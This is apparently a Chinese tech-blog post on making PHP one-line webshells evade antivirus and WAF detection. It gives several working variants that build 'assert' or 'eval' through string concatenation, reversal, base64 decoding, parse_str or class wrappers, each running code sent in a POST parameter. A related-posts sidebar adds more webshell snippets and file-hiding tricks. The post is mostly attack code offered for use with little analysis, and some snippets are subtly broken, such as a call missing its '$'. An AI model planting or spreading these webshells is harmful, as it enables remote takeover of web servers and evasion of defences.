一句话木马免杀

最新推荐文章于 2025-10-18 04:15:28 发布
原创 最新推荐文章于 2025-10-18 04:15:28 发布 · 485 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 

<?php

$a="TR"."Es"."sA";

$b=strtolower($a);

$c=strrev($b);

@$c($_POST['jaden']);

?>

一句话木马免杀本质上就是把一句话目标进行变形。比如说360这种查木马的时候规则设置并不完美,所以可以通过字符串拼接,字符串旋转,变小写等等,进行绕过。

<?php
function fun($a){
    @eval($a);
}
@fun($_POST['jaden']);
?>

这个就用了一个函数进行绕过检查

不过这都是过时又简单的方式。接下来可以通过编码解码的方式进行绕过

<?php
$a=base64_decode("YXNzZXJ0");
@a($_POST['jaden']);
?>
<?php
$str="a=eval";
parse_str($str);
$a($_POST['jaden']);
?>

一定要注意很多php一句话木马,一定要注意你写的版本和目标php的版本,版本不一致,版本不兼容很容易导致失败。就算不报错也要注意自己写的绕过自己是否可以识别,你就比如说你使用base64加密,虽然你加密成功了,但是的工具蚁剑是否可以连上。你的工具要是别的出你免杀后的代码

最后的最后

<?php
class zeo2
{
    public $b ='';

    function post(){
        return $_POST['jaden'];
    }
}
class zeo extends zeo2
{
    public $code=null;
    function __construct(){
    $code=parent::post();
    assert($code);
    }
}
$blll=new zeo;
$bzzz=new zeo2;
?>

虽然代码我不能理解,但是老师jaden现实了,我还是先记下来

knightKevin
关注
一句话木马以及
抚琴
01-08 4141
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF般都是维护个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf直告警也很烦,所以waf般会稳定为首要目标,也会放宽下规则,这就是绕的基础 查软件我首先:D盾 『D盾_防火墙』专为IIS设计的个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
php简短一句话木马,/一句话木马(PHP)
weixin_39598568的博客
03-13 2903
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马。Webshell检测方式网上有很多一句话木马,但是如果不知道主流毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下个payload。因此在此之前,先来了解下都有哪些检测方式。日志检测使用Web...
精简&明文冰蝎php一句话.php
10-30
php一句话绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
木马只需要简单一句话php
02-12
木马只需要简单的一句话代码php文件就可以轻松过,可以参考
PHP一句话木马变形技术:webshell项目中的15种编码绕过技巧
最新发布
gitblog_00489的博客
10-18 814
在Web安全领域,Webshell(网页后门)是攻击者常用的工具之。而PHP一句话木马由于其短小精悍、功能强大的特点,成为了许多攻击者的首选。然而,随着安全防护技术的不断提升,传统的PHP一句话木马很容易被WAF(Web应用防火墙)检测到。因此,掌握PHP一句话木马的变形技术,特别是编码绕过技巧,对于安全研究人员和渗透测试人员来说至关重要。 本文章将详细介绍webshell项目中常用的15种P...
代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
php一句话木马
qq_58683895的博客
11-21 2850
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成
简单的一句话木马
2301_77927094的博客
12-21 2009
php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的一句话木马能被低版本的D盾直接扫出,所以必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查。必需,规定在字符串的何处开始替换。
PHP一句话木马(2)
小刚的博客
10-14 986
作者:小刚 位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马小技巧小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马,也称不死马。小结 小技巧 1.隐藏php文件。 在windows下有个attrib命令,能够帮助我们实现文件的隐藏。 atttrib +s +a +h +r shell.php #隐藏 atttrib -s -a -h -r shell.php #显示 2.逻辑判断木马 <? @eval.
AES加密的一句话木马
05-15
### AES加密一句话木马技术概述 AES(Advanced Encryption Standard)是种对称加密算法,广泛应用于数据保护场景中。当涉及到一句话木马时,AES可以作为种有效的方式来隐藏其真实意图和功能,从而达到...
PHP一句话木马(3)
小刚的博客
10-14 1235
作者:小刚 位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马小技巧小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结 小技巧 1.ADS隐藏。 windows数据流有个很好的方式隐藏数据。 通过命令行 echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg 会在本地生成个shell.php文件,但打开却发现没有内容.
PHP一句话
10-23
PHP一句话
PHP一句话木马学习
qq_45780190的博客
05-11 3742
PHP一句话木马学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码
一句话木马
热门推荐
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单,以及个不死马的实现。 文章目录一句话木马及原理一句话木马简单、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
PHP一句话木马(通过VirusTotal测试)
m0_52233414的博客
01-28 3720
通过拼接,编码,加密等方法对PHP一句话木马进行处理
PHP一句话木马
墨痕诉清风的博客
10-07 7012
目录 小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 木马构造 一句话测试 异或转码数据 小结 小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5679
PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
一句话木马(最新php后门一句话
Coisini的博客
06-15 1万+
各位同学 对 一句话木马 我写了第5篇了,没有绝对的安全 我们在完善中!啊哈哈 这段代码 可以被利用做后门 暂时。 代码: &lt;?php //t.php $test = $_GET['r']; echo `$test`; ?&gt; 大家看看这个代码有木有问题?我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被个符号包起来了,既然是变量为什么...
PHP一句话木马
小刚的博客
07-26 9826
作者:小刚 位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马小技巧小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串木马构造一句话测试异或转码数据 小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值